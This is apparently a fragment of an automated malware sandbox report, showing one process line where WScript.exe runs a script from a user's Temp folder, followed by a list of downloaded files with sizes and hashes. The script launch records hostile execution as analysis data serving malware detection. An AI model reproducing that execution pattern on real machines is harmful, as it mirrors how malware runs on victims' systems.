-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\jeegzjj.vbs"5⤵
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
717B
MD5822467b728b7a66b081c91795373789a
SHA1d8f2f02e1eef62485a9feffd59ce837511749865
SHA256af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6
-
Filesize
192B
MD567ae2d124e4038b122b4892ae392c2ae
SHA1baa2b9c20c2c94795129be4afd1074ee53b25546
SHA2568976151356b0c1644cadf2fb3fa00d2bf277cbcfe4200118fd9d2a2089ddc997
SHA512939bce093dab40700e827b8d1b4fe6780b007b184b09b95fe92eef07511f2c08dab3a5377f48427c7d9e3192297a04b0ef1646e6102e5fad79bfbbfbaf517706
-
Filesize
53KB
MD5d4d8cef58818612769a698c291ca3b37
SHA154e0a6e0c08723157829cea009ec4fe30bea5c50
SHA25698fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0
SHA512f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6
-
Filesize
1KB
MD571444def27770d9071039d005d0323b7
SHA1cef8654e95495786ac9347494f4417819373427e
SHA2568438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9
SHA512a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034
-
Filesize
187KB
MD58cc6be5a2911ea3dc1a05c80e20ede55
SHA15a68267614fc4f21b949dc82def16adb1a2a7178
SHA2567dfd8c4c8c675118ad9020c10d439d7037b6d9e8a37482f80ae821fed5b29824
SHA512cc57268ceca2b9911b1672d18692dca2bfcb65052c8b945614f766e66ed849bf8f14aa9076f7478026144f89995c1552ac596153bde157349bcca880094a264a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD59c0e2939e93726f02c6d63773936b035
SHA198538d412084fdec0e31adbc57ccc1d1cbd6ba5b
SHA25655d03b2840cdb4e449d9eebf11828e9220045eb181084c67f71669e5c4221707
SHA512af500eef5d7de38bae6ce75099e7618260dfabba686cc9918064436771b95955a28f208e164cd9c1630b38467bf6f8f3de7173dfd1593a62ec5f500efbe26cb8
-
Filesize
346B
MD566442ccd48f759b031f9b823384e55bc
SHA1b23d081bdc9686e199bcd24aeccd77ccf4550dc6
SHA2568705236d12f3890c431eef683356787b711351e8b302a2cc1fd333ecd8198355
SHA5125fdb17e0e5f520bcaaab6a160655d608f8e5cefe49c6aa221b808d256294ae565e05f3f097c875ed716e8424c4c180418d7216014846d54a44948961169df245
-
Filesize
455KB
MD5a0607f4d8ebecdddbba3b17bb1eb8b8c
SHA1e594be84d002b1ad78211854e34ba47423e9bc02
SHA256823211deddb6c1dfbe4d5bbe5a0a8395c920dc5f1aea8f35d0b2de9d6e715db5
SHA51239f9f1f30ed568f1d3d81af81973ce72dfc9f85b8d1b03e63b4bd56d31bb6c2935d71bf4e87a0764a74041a28b9ad27bd2a80e43498e7d08feb3aee50e3cebe1
-
Filesize
519KB
MD59cc29e9c2f524984e4ea412888fad3ab
SHA1a3d9571861e7f334d70d82eb0c46e10f5427358e
SHA2566b8159ea57129f319affa7fa8ca8a74bb1e59894e7c269675df3f65b3c5e3887
SHA512d5761c80074c464327e346f2c89daed8de0691cc7d60140648f94c3d45232c035cebde895234118480abf6cdad4e187fcfb5fdd393aace83a52df62b4a493396
-
Filesize
91.3MB
-
Filesize
480KB
-
Filesize
480KB
-
Filesize
480KB
-
Filesize
136KB
-
Filesize
304KB
-
Filesize
136KB
-
Filesize
5.6MB
-
Filesize
104KB
-
Filesize
63.6MB
-
Filesize
6.5MB
-
Filesize
600KB
-
Filesize
120KB
-
Filesize
3.3MB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
6.2MB
-
Filesize
216KB
-
Filesize
91.3MB
-
Filesize
91.3MB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
144KB
-
Filesize
144KB
-
Filesize
144KB
-
Filesize
304KB
-
Filesize
3.3MB
-
Filesize
100KB
-
Filesize
63.6MB
-
Filesize
18.3MB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
63.6MB
-
Filesize
392KB
-
Filesize
392KB
-
Filesize
392KB